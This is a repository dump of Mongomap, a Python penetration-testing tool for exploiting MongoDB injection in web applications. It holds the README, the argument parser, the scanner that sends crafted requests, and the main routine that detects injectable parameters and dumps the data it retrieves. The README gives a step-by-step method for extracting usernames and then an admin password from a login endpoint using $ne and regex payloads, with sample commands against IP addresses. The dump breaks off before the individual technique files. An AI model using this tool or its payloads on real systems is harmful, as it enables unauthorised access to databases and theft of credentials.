├── .gitignore ├── LICENSE ├── README.md ├── __init__.py ├── banner.txt ├── lib ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-36.pyc │ ├── __init__.cpython-38.pyc │ ├── argextractor.cpython-36.pyc │ ├── argextractor.cpython-38.pyc │ ├── scanner.cpython-36.pyc │ ├── scanner.cpython-38.pyc │ ├── tester.cpython-36.pyc │ └── tester.cpython-38.pyc ├── argextractor.py ├── scanner.py └── tester.py ├── mongomap.py ├── tests ├── __init__.py ├── __pycache__ │ ├── __init__.cpython-36.pyc │ ├── __init__.cpython-38.pyc │ ├── notEqualsArrayInjection.cpython-36.pyc │ ├── notEqualsArrayInjection.cpython-38.pyc │ ├── regexArrayBlindInjection.cpython-36.pyc │ ├── regexArrayBlindInjection.cpython-38.pyc │ ├── whereAlwaysTrueFunctionInjection.cpython-36.pyc │ ├── whereAlwaysTrueFunctionInjection.cpython-38.pyc │ ├── whereAlwaysTrueInjection.cpython-36.pyc │ ├── whereAlwaysTrueInjection.cpython-38.pyc │ ├── whereBlindFunctionJSONStringifyInjection.cpython-36.pyc │ ├── whereBlindFunctionJSONStringifyInjection.cpython-38.pyc │ ├── whereBlindJSONStringifyInjection.cpython-36.pyc │ ├── whereBlindJSONStringifyInjection.cpython-38.pyc │ ├── whereObjectIDEnumerationBlindInjection.cpython-36.pyc │ └── whereObjectIDEnumerationBlindInjection.cpython-38.pyc ├── notEqualsArrayInjection.py ├── regexArrayBlindInjection.py ├── whereAlwaysTrueFunctionInjection.py ├── whereAlwaysTrueInjection.py ├── whereBlindFunctionJSONStringifyInjection.py ├── whereBlindJSONStringifyInjection.py └── whereObjectIDEnumerationBlindInjection.py ├── txt ├── common-columns.txt └── mongodb_nosqli.txt └── util ├── __pycache__ ├── output.cpython-36.pyc └── output.cpython-38.pyc └── output.py /.gitignore: -------------------------------------------------------------------------------- 1 | tests/notes.txt 2 | tests/nosqlmaptests.txt 3 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2019 Hex27 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # Mongomap 2 | 3 | Mongomap is a penetration-testing tool inspired by SQLMap, made specifically for MongoDB Injection on web applications. 4 | 5 | ## Why make this when [nosqlmap](https://github.com/codingo/NoSQLMap) is a thing? 6 | That other project seems to be centric on detecting the presence of noSQL injection, instead of actually exploiting the vulnerability. It also has a wide range of targets, including open DB ports. MongoMap, however, primarily aims to exploit MongoDB Injection to retrieve data from web applications. 7 | 8 | ## Why only MongoDB and why is it not very efficient on large volumes of data? 9 | Because I initially made it for a CTF challenge. 10 | 11 | However, I am open to supporting more DB backends, and making my code more efficient, I'd just need some time to actually get down to doing it. 12 | 13 | ## Installation 14 | As of now, Mongomap as 2 dependencies: 15 | requests 16 | 17 | colorama 18 | 19 | You can use the package manager [pip](https://pip.pypa.io/en/stable/) to install these libraries. 20 | 21 | ```bash 22 | pip install requests 23 | pip install colorama 24 | ``` 25 | 26 | As an additional note, Mongomap is made with python3 27 | 28 | ## Usage 29 | 30 | This command will display MongoMap's various arguments and syntaxes 31 | ```bash 32 | python3 mongomap.py 33 | ``` 34 | 35 | ``` 36 | ╔═╗╔═╗╔═══╗╔═╗─╔╗╔═══╗╔═══╗╔═╗╔═╗╔═══╗╔═══╗ 37 | ║║╚╝║║║╔═╗║║║╚╗║║║╔═╗║║╔═╗║║║╚╝║║║╔═╗║║╔═╗║ 38 | ║╔╗╔╗║║║─║║║╔╗╚╝║║║─╚╝║║─║║║╔╗╔╗║║║─║║║╚═╝║ 39 | ║║║║║║║║─║║║║╚╗║║║║╔═╗║║─║║║║║║║║║╚═╝║║╔══╝ 40 | ║║║║║║║╚═╝║║║─║║║║╚╩═║║╚═╝║║║║║║║║╔═╗║║║─── 41 | ╚╝╚╝╚╝╚═══╝╚╝─╚═╝╚═══╝╚═══╝╚╝╚╝╚╝╚╝─╚╝╚╝─── 42 | By Hex_27 43 | [*] Usage: mongomap -u [url] ... 44 | 45 | -u Refers to the URL of the target. Includes port and get parameters if you are using get requests. 46 | --method Set to either "post" or "get". By default, this will be set to "get" 47 | --data If you are using post requests, use this option to specify post data 48 | --file Same as --data, but you specify a file containing the parameters instead. 49 | 50 | [*] --Flexibility-- 51 | --cookies Set cookies to send. Separate different cookies with & 52 | --headers Specifies a header to send. Separate different headers with ; 53 | --maxbrute Default value is 100. This is the maximum number of bruteforce attempts the program will try. Set to 0 for limitless. 54 | --maxthreads Default value is 50. This is the maximum number of concurent threads the program will spawn. 55 | --csrftoken Specify the csrftoken to be checked for. You must modify code for this option to work. 56 | --ignorecheck Ignore a certain check. Set these when false positives are found. Can be set to the following. 57 | 58 | text --- Ignore website content comparisons. Useful for combatting CSRF. 59 | status --- Ignore status code comparison 60 | url --- Ignore redirect URL comparison 61 | 62 | --maxthreads Default value is 50. This is the maximum number of concurent threads the program will spawn. 63 | -t Specify some technique IDs to use. 64 | 65 | [*] --Post-Detection-- 66 | --dump Attempts to retrieve as much information as possible via detected injection methods. If no other post-detection options are used, dump will be used by default. 67 | 68 | [*] --Help and Documentation-- 69 | -h --help Shows this help page. Use with -t to display documentation regarding the specified techniques 70 | -ts --techniques Display all techniques. 71 | 72 | [*] --Examples-- 73 | [*] mongomap -u http://challenger.com?sad=22 74 | [*] mongomap -u http://localhost:2222?search=1 -t 324 75 | [*] mongomap -u http://localhost:2222?search=1 -t w 76 | [*] mongomap -u http://192.168.1.321 --method post --data "username=hi&password=letmein" 77 | [*] mongomap -u https://target.com:1231?foo=1 --cookies "PHPSESSID=1242345234512345&ID=123" 78 | [*] mongomap -u http://10.10.10.123 --method post --data search=1 --headers "Host: administrator1.friendzone.red; User-Agent: imlazytotypethis" 79 | [*] mongomap -u http://152.104.10.55:20001/v1/account/login --method json --data {\"username\":\"admin\",\"password\":\"1\"} 80 | [*] mongomap -u http://175.104.10.55:20001/v1/account/login --method json --data {\"username\":{\"$ne\":\"1\"},\"password\":\"1\"} 81 | [*] mongomap -u http://112.104.10.55:20001/v1/account/login --method json --file params.txt 82 | ``` 83 | 84 | ### Why does my regex check not work, despite it being vulnerable? 85 | 86 | Because the tool is dumb and I can't think of a good way to implement an automatic solution for this. 87 | 88 | If you have multiple parameters, technique 1 (Regex injection) for extracting plaintext data won't work properly automatically. 89 | 90 | So, just give it a little help, and do things manually step by step. Let's say you have a username and a password, and you want to extract both usernames and passwords. 91 | 92 | Step 1, get the usernames 93 | ```bash 94 | mongomap -u http://noobsite.com/api/login --method json --data {\"username\":\"1\",\"password\":{\"$ne\":\"1\"}} -p username 95 | ``` 96 | This should force mongomap to dump out all usernames it can extract. 97 | 98 | Step 2, find the password for each username. 99 | ```bash 100 | mongomap -u http://noobsite.com/api/login --method json --data {\"username\":\"admin\",\"password\":\"1\"} -p password 101 | ``` 102 | Let's say one of the dumped usernames from Step 1 is "admin". Set that as the username, then force the vulnerable parameter to be password. 103 | 104 | Now, mongomap will attempt to dump the password of admin. 105 | 106 | Yay. It works. Kinda. 107 | 108 | ## What does it work against? 109 | You can check the full description of each technique I've written to perform MongoDB Injection with this command: 110 | ```bash 111 | python3 mongomap.py -h -t aw 112 | ``` 113 | It contains most of my documentation for those techniques. However, the basic payloads involved are: 114 | Parsing in PHP arrays (Instead of username=a, it sends username[$ne]=a, so poorly sanitised MongoDB backends will have a different request) 115 | Injecting WHERE requests by parsing javascript with single or double quote escapes. There's a payload for a simple where check, as well as injecting into Javascript functions. 116 | 117 | The tool attempts to detect differences in page contents, or status code, in order to determine success in injection. 118 | However, the difference detection mechanism is still kind of skimpy and prone to false positives, and definitely can be polished more. 119 | 120 | Additionally, as a new feature, mongomap will now work with json data types for technique 0 and 1, the not equals injection and the regex injection. 121 | 122 | ## Contributing 123 | Pull requests are welcome, though I may take a while to respond. 124 | For major changes, please open an issue first to discuss what you would like to change. 125 | This is one of my first public python projects, and there definitely is a lot I can improve on with this code. Do leave some tips for me if you find that I've missed something. 126 | 127 | ## License 128 | [MIT](https://choosealicense.com/licenses/mit/) 129 | -------------------------------------------------------------------------------- /__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/__init__.py -------------------------------------------------------------------------------- /banner.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | ╔═╗╔═╗╔═══╗╔═╗─╔╗╔═══╗╔═══╗╔═╗╔═╗╔═══╗╔═══╗ 4 | ║║╚╝║║║╔═╗║║║╚╗║║║╔═╗║║╔═╗║║║╚╝║║║╔═╗║║╔═╗║ 5 | ║╔╗╔╗║║║─║║║╔╗╚╝║║║─╚╝║║─║║║╔╗╔╗║║║─║║║╚═╝║ 6 | ║║║║║║║║─║║║║╚╗║║║║╔═╗║║─║║║║║║║║║╚═╝║║╔══╝ 7 | ║║║║║║║╚═╝║║║─║║║║╚╩═║║╚═╝║║║║║║║║╔═╗║║║─── 8 | ╚╝╚╝╚╝╚═══╝╚╝─╚═╝╚═══╝╚═══╝╚╝╚╝╚╝╚╝─╚╝╚╝─── 9 | By Hex_27 -------------------------------------------------------------------------------- /lib/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__init__.py -------------------------------------------------------------------------------- /lib/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /lib/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/__init__.cpython-38.pyc -------------------------------------------------------------------------------- /lib/__pycache__/argextractor.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/argextractor.cpython-36.pyc -------------------------------------------------------------------------------- /lib/__pycache__/argextractor.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/argextractor.cpython-38.pyc -------------------------------------------------------------------------------- /lib/__pycache__/scanner.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/scanner.cpython-36.pyc -------------------------------------------------------------------------------- /lib/__pycache__/scanner.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/scanner.cpython-38.pyc -------------------------------------------------------------------------------- /lib/__pycache__/tester.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/tester.cpython-36.pyc -------------------------------------------------------------------------------- /lib/__pycache__/tester.cpython-38.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/lib/__pycache__/tester.cpython-38.pyc -------------------------------------------------------------------------------- /lib/argextractor.py: -------------------------------------------------------------------------------- 1 | 2 | import sys; 3 | from .scanner import Scanner; 4 | 5 | from util.output import info; 6 | from util.output import verbose; 7 | from util.output import success; 8 | from util.output import failure; 9 | from util.output import plain; 10 | from util.output import bold; 11 | from util.output import yellow; 12 | from .tester import getTests; 13 | 14 | import json; 15 | 16 | def showHelp(): 17 | bold("Usage: mongomap -u [url] ..."); 18 | plain(""); 19 | plain("-u"+"\t\t"+"Refers to the URL of the target. Includes port and get parameters if you are using get requests."); 20 | plain("--method"+"\t"+"Set to either \"post\" or \"get\". By default, this will be set to \"get\""); 21 | plain("--data"+"\t"+"If you are using post or json requests, use this option to specify post data"); 22 | plain("--file"+"\t"+"Same as --data, but you specify a file containing the parameters instead."); 23 | plain(""); 24 | bold("--Flexibility--"); 25 | plain("--cookies"+"\t"+"Set cookies to send. Separate different cookies with &"); 26 | plain("--headers"+"\t"+"Specifies a header to send. Separate different headers with ;"); 27 | plain("--maxbrute"+"\t"+"Default value is 100. This is the maximum number of bruteforce attempts the program will try. Set to 0 for limitless."); 28 | plain("--maxthreads"+"\t"+"Default value is 50. This is the maximum number of concurent threads the program will spawn."); 29 | plain("--csrftoken"+"\t"+"Specify the csrftoken to be checked for. You must modify code for this option to work."); 30 | plain("--ignorecheck"+"\t"+"Ignore a certain check. Set these when false positives are found. Can be set to the following."); 31 | plain(""); 32 | plain("\t" + "text --- Ignore website content comparisons. Useful for combatting CSRF."); 33 | plain("\t" + "status --- Ignore status code comparison"); 34 | plain("\t" + "url --- Ignore redirect URL comparison"); 35 | plain(""); 36 | plain("--maxthreads"+"\t"+"Default value is 50. This is the maximum number of concurent threads the program will spawn."); 37 | plain("-t"+"\t"+"Specify some technique IDs to use."); 38 | plain(""); 39 | bold("--Post-Detection--"); 40 | plain("--dump" + "\t" + "Attempts to retrieve as much information as possible via detected injection methods. If no other post-detection options are used, dump will be used by default."); 41 | #plain("--objectids" + "\t" + "Specify a list of objectIDs to try to grab data from. Separate with commas."); 42 | plain(""); 43 | bold("--Help and Documentation--"); 44 | plain("-h --help" + "\t" + "Shows this help page. Use with -t to display documentation regarding the specified techniques"); 45 | plain("-ts --techniques" + "\t" + "Display all techniques."); 46 | plain(""); 47 | bold("--Examples--"); 48 | bold("mongomap -u http://challenger.com?sad=22"); 49 | bold("mongomap -u http://localhost:2222?search=1 -t 324"); 50 | bold("mongomap -u http://localhost:2222?search=1 -t w"); 51 | bold("mongomap -u http://192.168.1.321 --method post --data \"username=hi&password=letmein\""); 52 | bold("mongomap -u https://target.com:1231?foo=1 --cookies \"PHPSESSID=1242345234512345&ID=123\""); 53 | bold("mongomap -u http://10.10.10.123 --method post --data search=1 --headers \"Host: administrator1.friendzone.red; User-Agent: imlazytotypethis\""); 54 | bold("mongomap -u http://152.104.10.55:20001/v1/account/login --method json --data {\\\"username\\\":\\\"admin\\\",\\\"password\\\":\\\"1\\\"}"); 55 | bold("mongomap -u http://175.104.10.55:20001/v1/account/login --method json --data {\\\"username\\\":{\\\"$ne\\\":\\\"1\\\"},\\\"password\\\":\\\"1\\\"}"); 56 | bold("mongomap -u http://112.104.10.55:20001/v1/account/login --method json --file params.txt"); 57 | plain(""); 58 | 59 | 60 | def showTechniques(): 61 | plain(""); 62 | bold("--Techniques--"); 63 | plain(""); 64 | tests = getTests("","",Scanner("http://localhost/index.php?me=a")); 65 | print(" %-5s|%-6s|%-20s"%("ID","Type","Name")); 66 | print("_"*50); 67 | for testname in tests: 68 | test = tests[testname]; 69 | print(" %-5d|%-6s|%-20s"%(test.getID(),test.getType(),testname)); 70 | plain(""); 71 | bold("Use the -t command with -h to show help regarding each technique."); 72 | 73 | def showTechniqueHelp(techniques): 74 | tests = getTests("","",Scanner("http://localhost/index.php?me=a")); 75 | for testname in tests: 76 | test = tests[testname]; 77 | if str(test.getID()) in techniques or str(test.getType()) in techniques: 78 | plain(""); 79 | success(testname); 80 | print("_"*50); 81 | failure("ID: " + str(test.getID())); 82 | type = "(a) Array Injection"; 83 | if test.getType() == "w": 84 | type = "(w) Where Injection"; 85 | if "blind" in testname.lower(): 86 | type = "Blind " + type; 87 | 88 | failure("Type: " + type); 89 | plain(""); 90 | test.doc(); 91 | print("_"*50); 92 | 93 | def extractArgs(): 94 | flags = ["dump","help","h","v","techniques","ts"]; 95 | options = ["u","t","method","data","p","cookies","headers","maxbrute","maxthreads","ignorecheck","csrftoken","objectids","file"]; 96 | 97 | parsed = {}; 98 | 99 | if len(sys.argv) <= 1: 100 | showHelp(); 101 | sys.exit(1); 102 | 103 | expectingVal = None; 104 | 105 | #Parse arguments 106 | for arg in range(1,len(sys.argv)): 107 | arg = sys.argv[arg]; 108 | if expectingVal == None: 109 | if arg.startswith("-"): 110 | arg = arg.replace("-",""); 111 | if arg in flags: 112 | parsed[arg] = True; 113 | elif arg in options: 114 | expectingVal = arg; 115 | else: 116 | failure("Unknown option/flag: "+arg); 117 | sys.exit(1); 118 | else: 119 | failure("Value without option: "+arg); 120 | sys.exit(1); 121 | else: 122 | if arg.startswith("-"): 123 | failure("Expecting value for option: "+expectingVal); 124 | sys.exit(1); 125 | else: 126 | parsed[expectingVal] = arg; 127 | expectingVal = None; 128 | 129 | 130 | verbose("Options provided:"); 131 | for key in parsed: 132 | if key in flags: 133 | verbose(key+" flag"); 134 | else: 135 | verbose(key+" - "+parsed[key]); 136 | 137 | if "techniques" in parsed or "ts" in parsed: 138 | showTechniques(); 139 | sys.exit(1); 140 | 141 | if "h" in parsed or "help" in parsed: 142 | if "t" not in parsed: 143 | showHelp(); 144 | else: 145 | techniques = parsed["t"]; 146 | showTechniqueHelp(techniques); 147 | sys.exit(1); 148 | 149 | if "u" not in parsed: 150 | failure("You must specify a target with -u!"); 151 | sys.exit(1); 152 | 153 | 154 | return parsed; 155 | 156 | def initScanner(parsed): 157 | url = parsed["u"]; 158 | method = "get"; 159 | data = ""; 160 | if "file" in parsed: 161 | f = open(parsed["file"],"r"); 162 | parsed["data"] = f.read(); 163 | f.close(); 164 | if "method" in parsed: 165 | if parsed["method"] == "post" or parsed["method"] == "json": 166 | if "data" not in parsed: 167 | failure("You must set the data option if you want to send post or json requests!"); 168 | sys.exit(1); 169 | method = parsed["method"]; 170 | if parsed["method"] == "json": 171 | try: 172 | data = json.loads(parsed["data"]); 173 | except: 174 | failure(parsed["data"]); 175 | failure("The data provided was not json, but mongomap was told to send json data."); 176 | sys.exit(1); 177 | if "data" in parsed: 178 | data = parsed["data"]; 179 | if method == "json": 180 | data = json.loads(data); 181 | 182 | scanner = Scanner(url,method,data); 183 | 184 | if "cookies" in parsed: 185 | cookies = {}; 186 | for entry in parsed["cookies"].split(";"): 187 | key,value = entry.split("="); 188 | key = key.strip(); 189 | value = value.strip(); 190 | cookies[key] = value; 191 | scanner.cookies = cookies; 192 | 193 | if "headers" in parsed: 194 | headers = {}; 195 | for entry in parsed["headers"].split(";"): 196 | key,value = entry.split(":"); 197 | key = key.strip(); 198 | value = value.strip(); 199 | headers[key] = value; 200 | scanner.headers = headers; 201 | 202 | if "maxthreads" in parsed: 203 | maxthreads = int(parsed["maxthreads"]); 204 | scanner.maxthreads = maxthreads; 205 | 206 | if "maxbrute" in parsed: 207 | maxbrute = int(parsed["maxbrute"]); 208 | scanner.maxbrute = maxbrute; 209 | 210 | 211 | if "objectids" in parsed: 212 | objectids = parsed["objectids"].split(","); 213 | scanner.objectIDs = objectids; 214 | 215 | if "csrftoken" in parsed: 216 | csrftoken = parsed["csrftoken"]; 217 | failure("Warning: CSRFToken handling is not coded yet. You must modify handleCSRF inside lib/scanner.py to let it work with a specific situation."); 218 | scanner.csrfToken = csrftoken; 219 | 220 | if "ignorecheck" in parsed: 221 | scanner.ignore_check = parsed["ignorecheck"].split(","); 222 | 223 | if "t" in parsed: 224 | scanner.techniques = parsed["t"]; 225 | 226 | 227 | return scanner; 228 | 229 | 230 | -------------------------------------------------------------------------------- /lib/scanner.py: -------------------------------------------------------------------------------- 1 | 2 | import sys; 3 | import requests; 4 | import urllib; 5 | import urllib.parse; 6 | import copy; 7 | import json; 8 | 9 | from .tester import getTests; 10 | 11 | from util.output import info; 12 | from util.output import failure; 13 | from util.output import question; 14 | from util.output import success; 15 | from util.output import bold; 16 | from util.output import verbose; 17 | 18 | class Scanner(): 19 | def __init__(self,url,method="get",data=""): 20 | self.url = url; 21 | self.method = method.lower(); 22 | self.textBaseline = ""; 23 | self.textErrorBaseline = ""; 24 | self.data = data; 25 | self.cookies = {}; 26 | self.headers = {}; 27 | self.handleData(); 28 | self.collections = []; 29 | 30 | self.element_attributes = []; 31 | self.objectIDs = []; 32 | 33 | self.maxthreads = 50; 34 | self.maxbrute = 100; 35 | self.tests = {}; 36 | self.ignore_check = []; 37 | self.csrfToken = ""; 38 | self.techniques = "aw"; 39 | 40 | def getParams(self): 41 | params = []; 42 | for key in self.data: 43 | params.append(key); 44 | 45 | return params; 46 | 47 | def dumpData(self,param,testname): 48 | test = self.tests[param][testname]; 49 | data = test.grabData(); 50 | return data; 51 | 52 | def testParam(self,p): 53 | successes = []; 54 | tests = getTests(self.url,p,self); 55 | self.tests[p] = tests; 56 | for testname in tests: 57 | test = tests[testname]; 58 | if str(test.getID()) in self.techniques or str(test.getType()) in self.techniques: 59 | info("Attempting " + testname); 60 | if test.vulnTest(): 61 | success(p+" is "+testname+" injectable!"); 62 | successes.append(testname); 63 | else: 64 | verbose("Skipping test " + testname); 65 | return successes; 66 | 67 | def handleCSRF(self,data): #To be changed whenever. 68 | session = requests.Session(); 69 | if self.csrfToken == "": 70 | return session; 71 | r = session.get(self.url); 72 | aStart = r.text.find('name="' + self.csrfToken + '" value="'); 73 | token = r.text[aStart+24:aStart+56] 74 | data[self.csrfToken] = token; 75 | return session; 76 | 77 | 78 | def sendData(self,data): 79 | 80 | session = self.handleCSRF(data); 81 | req = None; 82 | #print(data); 83 | if self.method == "get": 84 | data = copy.deepcopy(data); 85 | for param in data: 86 | data[param] = urllib.parse.quote(data[param]); 87 | strData = self.implodeData(data); 88 | req = session.get(self.url + "?" + strData,headers=self.headers,cookies=self.cookies,allow_redirects=False); 89 | elif self.method == "post": 90 | req = session.post(self.url,data,headers=self.headers,cookies=self.cookies,allow_redirects=False); 91 | elif self.method == "json": 92 | #print("DEBUG:",data); 93 | req = session.post(self.url, json=data); 94 | 95 | return req; 96 | 97 | def check(self,req): 98 | if req.status_code != self.status_baseline: 99 | if "status" not in self.ignore_check: 100 | return "status"; 101 | if req.url.split("?")[0] != self.url: 102 | if "url" not in self.ignore_check: 103 | return "url"; 104 | if req.text != self.textBaseline: 105 | if "text" not in self.ignore_check: 106 | return "text"; 107 | return "none"; 108 | 109 | def handleData(self): 110 | strData = self.data; 111 | if self.method == "get" and strData == "": 112 | split = self.url.split("?"); 113 | if len(split) != 2: 114 | failure("Get request method selected, but url has no get parameters"); 115 | sys.exit(1); 116 | else: 117 | self.explodeData(split[1]); 118 | self.url = split[0]; 119 | elif self.method == "post": 120 | self.explodeData(strData); 121 | elif self.method == "json": 122 | pass; #Already in the correct form. 123 | 124 | if "/" not in self.url.replace("://",""): 125 | bold("URL: " + self.url); 126 | if question("There is no / in your url. Do you want to add a trailing slash?"): 127 | self.url += "/"; 128 | 129 | def explodeData(self,string): 130 | data = {}; 131 | sent = string.split("&"); 132 | for keyval in sent: 133 | explode = keyval.split("="); 134 | if len(explode) != 2: 135 | data[keyval] = ""; 136 | else: 137 | data[explode[0]] = explode[1]; 138 | self.data = data; 139 | 140 | def implodeData(self,data): 141 | if self.method == "json": 142 | return json.dumps(data); #For printing purposes. 143 | stringData = ""; 144 | for key in data: 145 | stringData += key + "=" + data[key] + "&"; 146 | return stringData[:-1]; 147 | 148 | def testConnection(self): 149 | #try: 150 | req = self.sendData(self.data); 151 | self.status_baseline = req.status_code; 152 | if str(req.status_code).startswith("4"): 153 | failure("Website returned status code "+str(req.status_code)+"!"); 154 | 155 | self.textBaseline = req.text; 156 | 157 | if str(req.status_code).startswith("3"): 158 | if question("Redirect to " + req.url + " detected. Follow?"): 159 | self.url = req.url; 160 | return self.testConnection(); 161 | 162 | return True; 163 | #except Exception as err: 164 | #print(err); 165 | #return False; 166 | 167 | -------------------------------------------------------------------------------- /lib/tester.py: -------------------------------------------------------------------------------- 1 | 2 | import urllib.parse; 3 | from tests.regexArrayBlindInjection import RegexArrayBlindInjection; 4 | from tests.notEqualsArrayInjection import NotEqualsArrayInjection; 5 | from tests.whereAlwaysTrueInjection import WhereAlwaysTrueInjection; 6 | from tests.whereBlindJSONStringifyInjection import WhereBlindJSONStringifyInjection; 7 | from tests.whereAlwaysTrueFunctionInjection import WhereAlwaysTrueFunctionInjection; 8 | from tests.whereObjectIDEnumerationBlindInjection import WhereObjectIDEnumerationBlindInjection; 9 | from tests.whereBlindFunctionJSONStringifyInjection import WhereBlindFunctionJSONStringifyInjection; 10 | 11 | def getTests(url,param,scanner): 12 | tests = {\ 13 | "Not-Equals Array (param[$ne]) Injection":NotEqualsArrayInjection(url,param,scanner),\ 14 | "Regex Array (param[$regex]) Blind Injection":RegexArrayBlindInjection(url,param,scanner),\ 15 | "Where Always True Function Injection":WhereAlwaysTrueFunctionInjection(url,param,scanner),\ 16 | "Where (Function Javascript Evaluation) Blind Injection (JSONStringify)":WhereBlindFunctionJSONStringifyInjection(url,param,scanner),\ 17 | #Deprecated. JSONStringify methods of extraction are more efficient. #"Where ObjectID Enumeration Blind Injection":WhereObjectIDEnumerationBlindInjection(url,param,scanner),\ 18 | "Where Always True Injection":WhereAlwaysTrueInjection(url,param,scanner),\ 19 | "Where (Functionless String) Blind Injection (JSONStringify)":WhereBlindJSONStringifyInjection(url,param,scanner)\ 20 | }; 21 | return tests; 22 | -------------------------------------------------------------------------------- /mongomap.py: -------------------------------------------------------------------------------- 1 | import sys; 2 | 3 | from lib.argextractor import extractArgs; 4 | from lib.argextractor import initScanner; 5 | from lib.scanner import Scanner; 6 | 7 | from util.output import info; 8 | from util.output import verbose; 9 | from util.output import success; 10 | from util.output import bold; 11 | from util.output import failure; 12 | from util.output import question; 13 | from util.output import yellow; 14 | from util.output import setVerbose; 15 | from util.output import colinit; 16 | 17 | 18 | def banner(): 19 | file = open("banner.txt","r",encoding="utf-8"); 20 | banner = file.read().strip().split("\n"); 21 | file.close(); 22 | for line in banner: 23 | yellow(line); 24 | 25 | bold("v1.0.0"); 26 | 27 | def main(): 28 | colinit(); 29 | banner(); 30 | #Initiations 31 | parsed = extractArgs(); 32 | scanner = initScanner(parsed); 33 | 34 | 35 | #Test connection to target 36 | if scanner.testConnection(): 37 | success("URL can be reached."); 38 | else: 39 | failure(scanner.url+" cannot be reached. Did you forget http://?"); 40 | sys.exit(1); 41 | 42 | print() 43 | 44 | params = scanner.getParams(); 45 | 46 | if "v" in parsed: 47 | setVerbose(True); 48 | 49 | if "p" in parsed: 50 | toTest = parsed["p"].split(","); 51 | for param in toTest: 52 | if param not in params: 53 | failure("Param, " + param + " is not provided in your get/post data!"); 54 | sys.exit(1); 55 | params = toTest; 56 | 57 | verbose("Going to test the following parameters:"); 58 | for param in params: 59 | verbose(param); 60 | 61 | print() 62 | 63 | bold("Beginning testing phase."); 64 | vulnParams = {}; 65 | tested = 0; 66 | for param in params: 67 | tested += 1; 68 | bold("Testing for param "+param); 69 | successes = scanner.testParam(param); 70 | if len(successes) > 0: 71 | vulnParams[param] = successes; 72 | success(param + " is injectible."); 73 | if tested < len(params): 74 | if not question("Continue testing other parameters?"): 75 | break; 76 | 77 | print() 78 | bold("Test phase completed."); 79 | 80 | if len(vulnParams) == 0: 81 | failure("No vulnerable parameters found."); 82 | sys.exit(1); 83 | 84 | print() 85 | success("Vulnerable Parameters:"); 86 | for param in vulnParams: 87 | success(param); 88 | for vuln in vulnParams[param]: 89 | success("- " + vuln); 90 | 91 | print() 92 | info("Attempting to dump data..."); 93 | 94 | for param in vulnParams: 95 | bold("Parameter: " + param); 96 | for vuln in vulnParams[param]: 97 | print() 98 | bold("Attemping dump with " + vuln + " on param " + param); 99 | print() 100 | dump = scanner.dumpData(param,vuln); 101 | if dump == None: 102 | print() 103 | failure(vuln + " for " + param + " failed to dump."); 104 | else: 105 | print() 106 | success(vuln + " for " + param + " has retrieved:"); 107 | if type(dump) == type("str"): 108 | success("\t"+dump); 109 | elif type(dump) == type({}): 110 | for key in dump: 111 | success("\t"+str(key) + " : " + str(dump[key])); 112 | elif type(dump) == type([]): 113 | for i in dump: 114 | success("\t"+str(i)); 115 | print() 116 | 117 | 118 | main(); 119 | -------------------------------------------------------------------------------- /tests/__init__.py: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__init__.py -------------------------------------------------------------------------------- /tests/__pycache__/__init__.cpython-36.pyc: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Hex27/mongomap/d16cee2e0b2b2af3c3a34e4f1a21f66cc7dacafe/tests/__pycache__/__init__.cpython-36.pyc -------------------------------------------------------------------------------- /tests/__pycache__/__init__.cpython-38.pyc: -------------------------------------------------------------------------------- 